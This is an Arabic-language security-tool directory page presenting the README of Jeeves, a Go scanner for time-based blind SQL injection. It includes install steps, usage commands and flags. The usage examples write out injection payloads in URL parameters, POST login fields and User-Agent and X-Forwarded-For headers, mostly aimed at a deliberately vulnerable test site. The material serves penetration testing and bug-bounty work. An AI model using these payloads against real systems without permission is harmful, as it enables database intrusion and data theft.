Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
أدوات/GitHubGitHub/ferreiraklet/jeeves
ماسحات الثغرات الأمنيةأمن الويباختبار الاختراق
GitHubferreiraklet/jeeves

Jeeves

أداة كشف حقن SQL الأعمى القائم على الوقت لأغراض الاستطلاع ومكافآت الثغرات. تقبل عناوين URL مفردة أو قوائم، وتدعم الرؤوس المخصصة والخادم الوسيط وبيانات POST للمسح الآلي للثغرات.

عرض المستودع
2155044منذ 4 سنواتتمت المراجعة من قبل Kitploit

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

made-with-Go

Jeeves


الاستخدام • التثبيت

تم تصميم Jeeves للبحث عن حقن SQL الأعمى القائم على الوقت من خلال الاستطلاع.

المحتويات:

  • التثبيت
  • الاستخدام
    • إضافة الرؤوس
    • استخدام الخادم الوسيط
    • إجراء طلب POST
    • طرق استخدام متعددة

- التثبيت والمتطلبات:

تثبيت Jeeves 💀

root@kitploit:~
$ go install github.com/ferreiraklet/Jeeves@latest

OR

root@kitploit:~
$ git clone https://github.com/ferreiraklet/Jeeves.git
$ cd Jeeves
$ go build jeeves.go
$ chmod +x jeeves
$ ./jeeves -h

- الاستخدام والشرح:

في عملية الاستطلاع الخاصة بك، قد تجد نقاط نهاية قد تكون عرضة لحقن SQL، مثال: https://redacted.com/index.php?id=1

عناوين URL مفردة

root@kitploit:~
echo 'https://redacted.com/index.php?id=your_time_based_blind_payload_here' | jeeves -t payload_time
echo "http://testphp.vulnweb.com/artists.php?artist=" | qsreplace "(select(0)from(select(sleep(5)))v)" | jeeves --payload-time 5
echo "http://testphp.vulnweb.com/artists.php?artist=" | qsreplace "(select(0)from(select(sleep(10)))v)" | jeeves -t 10

في --payload-time يجب عليك استخدام الوقت المذكور في الحمولة


من قائمة

cat targets | jeeves --payload-time 5

إضافة الرؤوس

انتبه إلى الصياغة! يجب أن تكون متطابقة =>

root@kitploit:~
echo "http://testphp.vulnweb.com/artists.php?artist=" | qsreplace "(select(0)from(select(sleep(5)))v)" | jeeves -t 5 -H "Testing: testing;OtherHeader: Value;Other2: Value"

استخدام الخادم الوسيط

root@kitploit:~
echo "http://testphp.vulnweb.com/artists.php?artist=" | qsreplace "(select(0)from(select(sleep(5)))v)" | jeeves -t 5 --proxy "http://ip:port"
echo "http://testphp.vulnweb.com/artists.php?artist=" | qsreplace "(select(0)from(select(sleep(5)))v)" | jeeves -t 5 -p "http://ip:port"

الخادم الوسيط + الرؤوس =>

root@kitploit:~
echo "http://testphp.vulnweb.com/artists.php?artist=" | qsreplace "(select(0)from(select(sleep(5)))v)" | jeeves --payload-time 5 --proxy "http://ip:port" -H "User-Agent: xxxx"

طلب POST

إرسال البيانات عبر طلب POST (نماذج تسجيل الدخول، إلخ)

انتبه إلى الصياغة! يجب أن تكون متطابقة! ->

root@kitploit:~
echo "https://example.com/Login.aspx" | jeeves -t 10 -d "user=(select(0)from(select(sleep(5)))v)&password=xxx"
echo "https://example.com/Login.aspx" | jeeves -t 10 -H "Header1: Value1" -d "username=admin&password='+(select*from(select(sleep(5)))a)+'" -p "http://yourproxy:port"

طرق استخدام أخرى

يمكنك استخدام Jeeves مع أدوات أخرى، مثل gau وgauplus وwaybackurls وqsreplace وbhedak، لإتقان قوته.


علامات سطر الأوامر:

root@kitploit:~
 Usage:
 -t, --payload-time,  The time from payload
 -p, --proxy          Send traffic to a proxy
 -c                   Set Concurrency, Default 25
 -H, --headers        Custom Headers
 -d, --data           Sending Post request with data
 -h                   Show This Help Message

الاستخدام مع قائمة حمولات SQL

root@kitploit:~
cat sql_wordlist.txt | while read payload;do echo http://testphp.vulnweb.com/artists.php?artist= | qsreplace $payload | jeeves -t 5;done

الاختبار في الرؤوس

root@kitploit:~
echo "https://target.com" | jeeves -H "User-Agent: 'XOR(if(now()=sysdate(),sleep(5*2),0))OR'" -t 10
echo "https://target.com" | jeeves -H "X-Forwarded-For: 'XOR(if(now()=sysdate(),sleep(5*2),0))OR'" -t 10

Payload credit: https://github.com/rohit0x5

ملاحظة:

  • لا يتبع إعادة التوجيه، إذا كان رمز الحالة مختلفًا عن 200، فإنه يعيد "تحتاج تحليل يدوي"
  • Jeeves لا يقوم بالفحص الأولي، فهو غير قادر على إجراء طلبات لعناوين URL لا تحتوي على بروتوكول (http://, https://)

هذا المشروع مخصص للأغراض التعليمية ومكافأة الثغرات فقط! أنا لا أدعم أي أنشطة غير قانونية!.

إذا حدث أي خطأ في البرنامج، تواصل معي فورًا.

الرجاء أيضًا الاطلاع على هذه =>

Nilo - يتحقق مما إذا كان عنوان URL له حالة 200

SQLMAP

Blisqy حقن SQL قائم على الوقت في الرؤوس

تنزيل الأداة